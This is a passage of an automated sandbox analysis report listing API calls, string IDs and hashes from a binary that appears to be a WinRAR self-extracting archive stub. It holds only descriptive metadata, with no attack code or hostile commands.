                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscpy$ChangeNotify_wcschr_wcsncpy
                                                                                  • String ID: "$.lnk
                                                                                  • API String ID: 1911921660-4024015082
                                                                                  • Opcode ID: bb0bb07d20d58bc274e12b24089ba0bdb5e5ebd778e433f1e53f3b196b6d260a
                                                                                  • Instruction ID: 278b349919d3cb1b668631eb1181db1a3f53cfa3356272b2b6a730d4ec44b6fe
                                                                                  • Opcode Fuzzy Hash: bb0bb07d20d58bc274e12b24089ba0bdb5e5ebd778e433f1e53f3b196b6d260a
                                                                                  • Instruction Fuzzy Hash: 909186729042289ADF35DBA1CC45EEE73BCBB04304F4445BBE109F7081EB789AD88B55
                                                                                  APIs
                                                                                  • GetTempPathW.KERNEL32(?,?), ref: 0040ED8F
                                                                                    • Part of subcall function 0040A00A: _wcslen.LIBCMT ref: 0040A010
                                                                                    • Part of subcall function 0040A00A: _wcscat.LIBCMT ref: 0040A02F
                                                                                  • _swprintf.LIBCMT ref: 0040EDCB
                                                                                    • Part of subcall function 00401B74: __vswprintf_c_l.LIBCMT ref: 00401B87
                                                                                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 0040EDED
                                                                                  • _wcschr.LIBCMT ref: 0040EE20
                                                                                  • _wcscpy.LIBCMT ref: 0040EE64
                                                                                  • _wcscpy.LIBCMT ref: 0040EE8D
                                                                                  • _wcscpy.LIBCMT ref: 0040EEA0
                                                                                  • MessageBoxW.USER32(?,00000000,00000000,00000024), ref: 0040EED0
                                                                                  • EndDialog.USER32(?,00000001), ref: 0040EEF2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscpy$DialogItemMessagePathTempText__vswprintf_c_l_swprintf_wcscat_wcschr_wcslen
                                                                                  • String ID: %s%s%d
                                                                                  • API String ID: 1897388972-1000756122
                                                                                  • Opcode ID: 6a88fec46c6e2ed339dc460f0013721632dfbcda676ebdc8d99927cb56d757a2
                                                                                  • Instruction ID: fed5c536f3b2b7c610a00bc298727fa3e828a9ff45da11d674a63ad0a1871450
                                                                                  • Opcode Fuzzy Hash: 6a88fec46c6e2ed339dc460f0013721632dfbcda676ebdc8d99927cb56d757a2
                                                                                  • Instruction Fuzzy Hash: D951827280011CABDB21DB61DC44BEE77B9BB04308F4444BBE709A3191E7799AA98B59
                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 00418F58
                                                                                  • _malloc.LIBCMT ref: 00418F66
                                                                                    • Part of subcall function 0041CCEE: __FF_MSGBANNER.LIBCMT ref: 0041CD11
                                                                                    • Part of subcall function 0041CCEE: __NMSG_WRITE.LIBCMT ref: 0041CD18
                                                                                    • Part of subcall function 0041CCEE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,004210A4,00000000,00000001,00000000,?,0041ECDD,00000018,0042D8B8,0000000C,0041ED6E), ref: 0041CD65
                                                                                  • _wcscpy.LIBCMT ref: 00418F84
                                                                                  • _wcslen.LIBCMT ref: 00418F8A
                                                                                  • _wcscpy.LIBCMT ref: 00418FD2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscpy_wcslen$AllocateHeap_malloc
                                                                                  • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                  • API String ID: 2405444336-406990186
                                                                                  • Opcode ID: a39a975298e6c280c7f418a7708ae3b0cba04351458a02580fee1fe22ee1b99d
                                                                                  • Instruction ID: 8ed00ed3361364beb19460b19ebaa28e3934aa6a6d72a9a41527c955c98881c6
                                                                                  • Opcode Fuzzy Hash: a39a975298e6c280c7f418a7708ae3b0cba04351458a02580fee1fe22ee1b99d
                                                                                  • Instruction Fuzzy Hash: 85212872944304ABDB20AF54DC41ADA77B5EF44328B21041FE441A7291EBBCADE2839E
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 0040F38D
                                                                                  • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0040F3A2
                                                                                  • GetDlgItem.USER32(?,00000065), ref: 0040F3B1
                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0040F3C6
                                                                                  • GetSysColor.USER32(0000000F), ref: 0040F3CA
                                                                                  • SendMessageW.USER32(?,00000443,00000000,00000000), ref: 0040F3DA
                                                                                  • SetForegroundWindow.USER32(?), ref: 0040F3F4
                                                                                  • EndDialog.USER32(?,00000001), ref: 0040F427
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Item$ColorDialogForegroundWindow
                                                                                  • String ID: LICENSEDLG
                                                                                  • API String ID: 3794146707-2177901306
                                                                                  • Opcode ID: 5bf4323c514809b6aac91268663061aef5a0f9b8203f86075640bcbbe7bd9289
                                                                                  • Instruction ID: b3d4d6040a58ead9781f4e0a9c08f90d7aa975f3480a485700ae2804d7b30663
                                                                                  • Opcode Fuzzy Hash: 5bf4323c514809b6aac91268663061aef5a0f9b8203f86075640bcbbe7bd9289
                                                                                  • Instruction Fuzzy Hash: 52210B71200204BBDB31AFA1EC49F6B3BADFB59B14F409436FE05A51E1C6798865DB2C
                                                                                  APIs
                                                                                  • GetWindow.USER32(?,00000005), ref: 0040DA91
                                                                                  • GetClassNameW.USER32(00000000,?,00000800), ref: 0040DACA
                                                                                    • Part of subcall function 00411BD1: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,00000000,000000FF,00409BC8,?,00000000,?,00409CE2,00000000,-00000002,?,00000000,?), ref: 00411BE7
                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0040DAE8
                                                                                  • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0040DAFF
                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0040DB0E
                                                                                    • Part of subcall function 00419B88: GetDC.USER32(00000000), ref: 00419B94
                                                                                    • Part of subcall function 00419B88: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00419BA3
                                                                                    • Part of subcall function 00419B88: ReleaseDC.USER32(00000000,00000000), ref: 00419BB1
                                                                                    • Part of subcall function 00419B45: GetDC.USER32(00000000), ref: 00419B51
                                                                                    • Part of subcall function 00419B45: GetDeviceCaps.GDI32(00000000,00000058), ref: 00419B60
                                                                                    • Part of subcall function 00419B45: ReleaseDC.USER32(00000000,00000000), ref: 00419B6E
                                                                                  • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040DB35
                                                                                  • DeleteObject.GDI32(00000000), ref: 0040DB40
                                                                                  • GetWindow.USER32(00000000,00000002), ref: 0040DB49
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
                                                                                  • String ID: STATIC
                                                                                  • API String ID: 1444658586-1882779555
                                                                                  • Opcode ID: 9c39359ee33ba118c9e5bf82dadea384c3cf2197b7365b4ccf5d0ba242f48d8d
                                                                                  • Instruction ID: b2011dbba9a3bc3ba255de89cafec419f36bdcf8549ad9effb89a34e701b2038
                                                                                  • Opcode Fuzzy Hash: 9c39359ee33ba118c9e5bf82dadea384c3cf2197b7365b4ccf5d0ba242f48d8d
                                                                                  • Instruction Fuzzy Hash: 8D21D631E40204BBDB21ABA4DC86FEF7378AB41B44F414026FE04B61C1DB7CA946966D
                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: _strlen$_swprintf_wcschr_wcscpy_wcsncpy_wcsrchr
                                                                                  • String ID: %08x
                                                                                  • API String ID: 3224783807-3682738293
                                                                                  • Opcode ID: bbdd19f016625eef11faa4fdbd5798c0b2f9fd945c0c283110aeb49f0b8415de
                                                                                  • Instruction ID: 2344540725ce6d90efac3d14ec0117aaa2fc99d666fc041b412929bc598a6daf
                                                                                  • Opcode Fuzzy Hash: bbdd19f016625eef11faa4fdbd5798c0b2f9fd945c0c283110aeb49f0b8415de
                                                                                  • Instruction Fuzzy Hash: FD41D7325102196ADB24AA65DC81AFB33ACDB40354F50043BFA05E72D1EB7CDD9096EE
                                                                                  APIs
                                                                                    • Part of subcall function 0040A42F: _wcsrchr.LIBCMT ref: 0040A443
                                                                                  • _wcslen.LIBCMT ref: 0040A59C
                                                                                  • _wcscpy.LIBCMT ref: 0040A5D1
                                                                                    • Part of subcall function 0041097E: _wcslen.LIBCMT ref: 00410984
                                                                                    • Part of subcall function 0041097E: _wcsncat.LIBCMT ref: 0041099D
                                                                                  • _wcslen.LIBCMT ref: 0040A611
                                                                                  • _wcscpy.LIBCMT ref: 0040A683
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: _wcslen$_wcscpy$_wcsncat_wcsrchr
                                                                                  • String ID: .rar$exe$rar$sfx
                                                                                  • API String ID: 1023950463-630704357
                                                                                  • Opcode ID: 3e273efd549707747d43a6a5138d94cb353cae60e4e02cf3af8f5c99256b3f59
                                                                                  • Instruction ID: f83e943ddf972e8f8a22e2eb52403a1e06515caeb65f170328b258566fe773e3
                                                                                  • Opcode Fuzzy Hash: 3e273efd549707747d43a6a5138d94cb353cae60e4e02cf3af8f5c99256b3f59
                                                                                  • Instruction Fuzzy Hash: 2B312821104310A9C725AB219C56A7B73B89F15758B690C2FF8C2BB1D2E77D8CF2825F
                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 004193C9
                                                                                  • GetTickCount.KERNEL32 ref: 004193E4
                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004193F8
                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00419409
                                                                                  • TranslateMessage.USER32(?), ref: 00419413
                                                                                  • DispatchMessageW.USER32(?), ref: 0041941D
                                                                                  • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000204,?), ref: 004194BD
                                                                                  • ShowWindow.USER32(?,00000005), ref: 004194C8
                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 004194D2
                                                                                    • Part of subcall function 0041A27A: __lock.LIBCMT ref: 0041A298
                                                                                    • Part of subcall function 0041A27A: ___sbh_find_block.LIBCMT ref: 0041A2A3
                                                                                    • Part of subcall function 0041A27A: ___sbh_free_block.LIBCMT ref: 0041A2B2
                                                                                    • Part of subcall function 0041A27A: RtlFreeHeap.NTDLL(00000000,00000000,0042D5E0,0000000C,0041ED34,00000000,0042D8B8,0000000C,0041ED6E,00000000,0041A71B,?,004251F8,00000004,0042DAA0,0000000C), ref: 0041A2E2
                                                                                    • Part of subcall function 0041A27A: GetLastError.KERNEL32(?,004251F8,00000004,0042DAA0,0000000C,004210EE,00000000,0041A72A,00000000,00000000,00000000,?,0041E716,00000001,00000214), ref: 0041A2F3
                                                                                  Similarity
                                                                                  • API ID: Message$Window$CountTick$DispatchErrorFreeHeapLastPeekShowTextTranslate___sbh_find_block___sbh_free_block__lock
                                                                                  • String ID:
                                                                                  • API String ID: 1762286965-0
                                                                                  • Opcode ID: 968d995a82d5f0ea48cefb7abe764611dda9416a2252b86e5235ea0c7dc78474
                                                                                  • Instruction ID: 87a789d033c7877a5d6241aac1848da5b39df01b2a251d2073d25f1852c58bae
                                                                                  • Opcode Fuzzy Hash: 968d995a82d5f0ea48cefb7abe764611dda9416a2252b86e5235ea0c7dc78474
                                                                                  • Instruction Fuzzy Hash: 0B413871A00218BFCB20DFA5C8889DEBBB9FF48755B14845AF905D7250D734DE82CBA4
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00408413
                                                                                  • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00408436
                                                                                  • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00408455
                                                                                    • Part of subcall function 0040A2A0: _wcslen.LIBCMT ref: 0040A2A6
                                                                                    • Part of subcall function 00411BD1: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,00000000,000000FF,00409BC8,?,00000000,?,00409CE2,00000000,-00000002,?,00000000,?), ref: 00411BE7
                                                                                  • _swprintf.LIBCMT ref: 004084ED
                                                                                    • Part of subcall function 00401B74: __vswprintf_c_l.LIBCMT ref: 00401B87
                                                                                  • MoveFileW.KERNEL32(?,00000000), ref: 00408559
                                                                                  • MoveFileW.KERNEL32(00000000,?), ref: 0040859C
                                                                                    • Part of subcall function 00410951: _wcsncpy.LIBCMT ref: 00410968
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen_wcsncpy
                                                                                  • String ID: rtmp%d
                                                                                  • API String ID: 506780119-3303766350
                                                                                  • Opcode ID: 9dcb41b66bc9883f639689ce326a7a0d157b8eb283d37bb684c103709a5e220b
                                                                                  • Instruction ID: db8d7cd9f858afa19c11e334fa89902149cdf40e0c37418c1c820aad0f31ba4e
                                                                                  • Opcode Fuzzy Hash: 9dcb41b66bc9883f639689ce326a7a0d157b8eb283d37bb684c103709a5e220b
                                                                                  • Instruction Fuzzy Hash: 28418371901219AACF20EB61CE45ADF777CAF10394F0008BBB585B7181DB7C9B85CE69
                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: _wcschr$__vswprintf_c_l_swprintf_wcsncpy
                                                                                  • String ID: %c:\$%s.%d.tmp
                                                                                  • API String ID: 2474501127-1021493711
                                                                                  • Opcode ID: ec3a0a4596e00cb2bd479afa27f59465cb09bd272ae950c19ad5ae875a8a0cfc
                                                                                  • Instruction ID: 727a68eb672255717b6b5494873d0d1786742a6971a417f2f569041ee214a428
                                                                                  • Opcode Fuzzy Hash: ec3a0a4596e00cb2bd479afa27f59465cb09bd272ae950c19ad5ae875a8a0cfc
                                                                                  • Instruction Fuzzy Hash: 5B01262214430179D6206B369C45D6B63FCDFC6760B00C83FF495E71C1EA38D4A0827B
                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 00419057
                                                                                  • GetTickCount.KERNEL32 ref: 0041905C
                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0041908B
                                                                                  • TranslateMessage.USER32(?), ref: 00419099
                                                                                  • DispatchMessageW.USER32(?), ref: 004190A3
                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004190B0
                                                                                  • GetTickCount.KERNEL32 ref: 004190B6
                                                                                  • VariantInit.OLEAUT32(?), ref: 004190C3
Similarity
• API ID: Message$CountTick$DispatchInitPeekTranslateVariant
• String ID:
• API String ID: 4242828014-0
APIs
  • Part of subcall function 00419BEA: GetDC.USER32(00000000), ref: 00419BEE
  • Part of subcall function 00419BEA: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00419BF9
  • Part of subcall function 00419BEA: ReleaseDC.USER32(00000000,00000000), ref: 00419C04
• GetObjectW.GDI32(00000200,00000018,?), ref: 00419C42
• CoCreateInstance.OLE32(0042B198,00000000,00000001,0042B090,?,00000000,?), ref: 00419C72
  • Part of subcall function 00419A80: GetDC.USER32(00000000), ref: 00419A8C
  • Part of subcall function 00419A80: CreateCompatibleDC.GDI32(00000000), ref: 00419A9C
  • Part of subcall function 00419A80: CreateCompatibleDC.GDI32(?), ref: 00419AA3
  • Part of subcall function 00419A80: GetObjectW.GDI32(?,00000018,?), ref: 00419AB1
  • Part of subcall function 00419A80: CreateCompatibleBitmap.GDI32(?,00000200,00419C32), ref: 00419AD3
  • Part of subcall function 00419A80: SelectObject.GDI32(00000000,?), ref: 00419AE6
  • Part of subcall function 00419A80: SelectObject.GDI32(?,00000200), ref: 00419AF1
  • Part of subcall function 00419A80: StretchBlt.GDI32(?,00000000,00000000,00000200,00419C32,00000000,00000000,00000000,?,?,00CC0020), ref: 00419B0F
  • Part of subcall function 00419A80: SelectObject.GDI32(00000000,?), ref: 00419B19
  • Part of subcall function 00419A80: SelectObject.GDI32(?,00419C32), ref: 00419B21
  • Part of subcall function 00419A80: DeleteDC.GDI32(00000000), ref: 00419B2A
  • Part of subcall function 00419A80: DeleteDC.GDI32(?), ref: 00419B2F
  • Part of subcall function 00419A80: ReleaseDC.USER32(00000000,?), ref: 00419B35
Similarity
• API ID: Object$CreateSelect$Compatible$DeleteRelease$BitmapCapsDeviceInstanceStretch
• String ID: (
• API String ID: 189428636-3887548279
APIs
• _wcslen.LIBCMT ref: 004191FE
• _malloc.LIBCMT ref: 00419208
  • Part of subcall function 0041CCEE: __FF_MSGBANNER.LIBCMT ref: 0041CD11
  • Part of subcall function 0041CCEE: __NMSG_WRITE.LIBCMT ref: 0041CD18
  • Part of subcall function 0041CCEE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,004210A4,00000000,00000001,00000000,?,0041ECDD,00000018,0042D8B8,0000000C,0041ED6E), ref: 0041CD65
Similarity
• API ID: AllocateHeap_malloc_wcslen
• String ID: </p>$</style>$<br>$<style>
• API String ID: 4208083856-1200123991
APIs
• _malloc.LIBCMT ref: 0040D7F1
  • Part of subcall function 0041CCEE: __FF_MSGBANNER.LIBCMT ref: 0041CD11
  • Part of subcall function 0041CCEE: __NMSG_WRITE.LIBCMT ref: 0041CD18
  • Part of subcall function 0041CCEE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,004210A4,00000000,00000001,00000000,?,0041ECDD,00000018,0042D8B8,0000000C,0041ED6E), ref: 0041CD65
• _wcslen.LIBCMT ref: 0040D831
• _wcscat.LIBCMT ref: 0040D848
• _wcslen.LIBCMT ref: 0040D84E
• _wcscpy.LIBCMT ref: 0040D87C
Similarity
• API ID: _wcslen$AllocateHeap_malloc_wcscat_wcscpy
• String ID: }
• API String ID: 2020890722-4239843852
APIs
  • Part of subcall function 0040D8FF: _wcscpy.LIBCMT ref: 0040D904
• RegCreateKeyExW.ADVAPI32(80000001,Software\WinRAR SFX,00000000,00000000,00000000,00020006,00000000,?,?,C:\Users\user\AppData\Local\Temp), ref: 0040D989
• _wcslen.LIBCMT ref: 0040D997
• RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?,?), ref: 0040D9B2
• RegCloseKey.ADVAPI32(?), ref: 0040D9BB
Similarity
• API ID: CloseCreateValue_wcscpy_wcslen
• String ID: C:\Users\user\AppData\Local\Temp$Software\WinRAR SFX
• API String ID: 3170333323-2870035848
APIs
• LoadLibraryW.KERNEL32(Crypt32.dll,00000020,0040CDC0,00000020,?,?,00405D34,?,00000020,00000001,00000000,?,00000010,?,?,?), ref: 0040CD76
• GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0040CD8F
• GetProcAddress.KERNEL32(00437800,CryptUnprotectMemory), ref: 0040CD9B
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
• API String ID: 2238633743-1753850145
APIs
• __CreateFrameInfo.LIBCMT ref: 0041DB5D
  • Part of subcall function 0041A14B: __getptd.LIBCMT ref: 0041A159
  • Part of subcall function 0041A14B: __getptd.LIBCMT ref: 0041A167
• __getptd.LIBCMT ref: 0041DB67
  • Part of subcall function 0041E764: __getptd_noexit.LIBCMT ref: 0041E767
  • Part of subcall function 0041E764: __amsg_exit.LIBCMT ref: 0041E774
• __getptd.LIBCMT ref: 0041DB75
• __getptd.LIBCMT ref: 0041DB83
• __getptd.LIBCMT ref: 0041DB8E
• _CallCatchBlock2.LIBCMT ref: 0041DBB4
  • Part of subcall function 0041A1F0: __CallSettingFrame@12.LIBCMT ref: 0041A23C
  • Part of subcall function 0041DC5B: __getptd.LIBCMT ref: 0041DC6A
  • Part of subcall function 0041DC5B: __getptd.LIBCMT ref: 0041DC78
Similarity
• API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
• String ID:
• API String ID: 1602911419-0
APIs
• CharUpperW.USER32(?,?,?,?,00000400), ref: 0040D55C
• CharUpperW.USER32(?,?,?,?,?,00000400), ref: 0040D583
Similarity
• API ID: CharUpper
• String ID: -$z(D
• API String ID: 9403516-2779374180
APIs
• __EH_prolog.LIBCMT ref: 00406799
  • Part of subcall function 00402C8F: __EH_prolog.LIBCMT ref: 00402C94
• SetFileSecurityW.ADVAPI32(00000000,00000007,?,?,?,?,00000000,00000000,00406E51,00000000,?,?,00407680,?,?,?), ref: 00406821
• SetFileSecurityW.ADVAPI32(?,00000007,?,00000000,?,00000800,?,00407680,?,?,?,?,?,00000000,004082BC,?), ref: 00406848
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Similarity
                                                                                  • API ID: FileH_prologSecurity
                                                                                  • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                  • API String ID: 2167059215-639343689
                                                                                  APIs
                                                                                  • IsWindowVisible.USER32(?), ref: 0040E098
                                                                                  • DialogBoxParamW.USER32(GETPASSWORD1,?,0040D327,?,00000007), ref: 0040E0DC
                                                                                  Similarity
                                                                                  • API ID: DialogParamVisibleWindow
                                                                                  • String ID: GETPASSWORD1$z(D$z(D
                                                                                  • API String ID: 3157717868-2824312538
                                                                                  APIs
                                                                                  • EndDialog.USER32(?,00000001), ref: 0040D2E1
                                                                                  • GetDlgItemTextW.USER32(?,00000066,00000800), ref: 0040D2F7
                                                                                  • SetDlgItemTextW.USER32(?,00000065,?), ref: 0040D311
                                                                                  • SetDlgItemTextW.USER32(?,00000066), ref: 0040D31C
                                                                                  Similarity
                                                                                  • API ID: ItemText$Dialog
                                                                                  • String ID: RENAMEDLG
                                                                                  • API String ID: 1770891597-3299779563
                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 0041D89E
                                                                                    • Part of subcall function 0041E764: __getptd_noexit.LIBCMT ref: 0041E767
                                                                                    • Part of subcall function 0041E764: __amsg_exit.LIBCMT ref: 0041E774
                                                                                  • __getptd.LIBCMT ref: 0041D8AF
                                                                                  • __getptd.LIBCMT ref: 0041D8BD
                                                                                  Similarity
                                                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                  • String ID: MOC$csm
                                                                                  • API String ID: 803148776-1389381023
                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 00421963
                                                                                    • Part of subcall function 0041E764: __getptd_noexit.LIBCMT ref: 0041E767
                                                                                    • Part of subcall function 0041E764: __amsg_exit.LIBCMT ref: 0041E774
                                                                                  • __amsg_exit.LIBCMT ref: 00421983
                                                                                  • __lock.LIBCMT ref: 00421993
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 004219B0
                                                                                  • InterlockedIncrement.KERNEL32(02271680), ref: 004219DB
                                                                                  Similarity
                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                  • String ID:
                                                                                  • API String ID: 4271482742-0
                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 00411BFA
                                                                                  • _wcslen.LIBCMT ref: 00411C0B
                                                                                  • _wcslen.LIBCMT ref: 00411C1B
                                                                                  • _wcslen.LIBCMT ref: 00411C29
                                                                                  • CompareStringW.KERNEL32(00000400,00001001,?,?,00000000,?,?,00000000,?,00409E80,__rar_,00000000,00000006,00000000,?,?), ref: 00411C46
                                                                                  Similarity
                                                                                  • API ID: _wcslen$CompareString
                                                                                  • String ID:
                                                                                  • API String ID: 3397213944-0
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0041651B
                                                                                    • Part of subcall function 00412779: _realloc.LIBCMT ref: 004127D1
                                                                                    • Part of subcall function 0041A60A: _malloc.LIBCMT ref: 0041A624
                                                                                  • _memset.LIBCMT ref: 0041676B
                                                                                  • _memset.LIBCMT ref: 00416925
                                                                                  Similarity
                                                                                  • API ID: _memset$H_prolog_malloc_realloc
                                                                                  • String ID:
                                                                                  • API String ID: 1826288403-3916222277
                                                                                  APIs
                                                                                  Similarity
                                                                                  • API ID: _wcscpy
                                                                                  • String ID: T
                                                                                  • API String ID: 3048848545-3187964512
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00406C87
                                                                                  • _wcscpy.LIBCMT ref: 00406CBD
                                                                                  • SetFileTime.KERNEL32(?,?,?,?,00000000,00000005,?,00000011,00000000,?,00000000,?,0000003A,00000802,?,00000000), ref: 00406DDD
                                                                                  Similarity
                                                                                  • API ID: FileH_prologTime_wcscpy
                                                                                  • String ID: :
                                                                                  • API String ID: 26009825-336475711
                                                                                  APIs
                                                                                  • EndDialog.USER32(?,00000001), ref: 0040D46E
                                                                                  • GetDlgItemTextW.USER32(?,00000065,?,?), ref: 0040D483
                                                                                  • SetDlgItemTextW.USER32(?,00000065,?), ref: 0040D498
                                                                                  Similarity
                                                                                  • API ID: ItemText$Dialog
                                                                                  • String ID: ASKNEXTVOL
                                                                                  • API String ID: 1770891597-3402441367
                                                                                  • Opcode ID: 333ff92a145256b3d73e268582a3974dcadf7a6aad4be80f4f5285986db0e231
                                                                                  • Instruction ID: 15e289bba468da19e455fbefc74a83a6ceb9ff2e3901e96efcbcfe65ae9c2d6f
                                                                                  • Opcode Fuzzy Hash: 333ff92a145256b3d73e268582a3974dcadf7a6aad4be80f4f5285986db0e231
                                                                                  • Instruction Fuzzy Hash: 0411BE35600200BBDA219FA99C05F7A7B65EB0A710F404036FA04FB1E0C77AE8299B5E
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
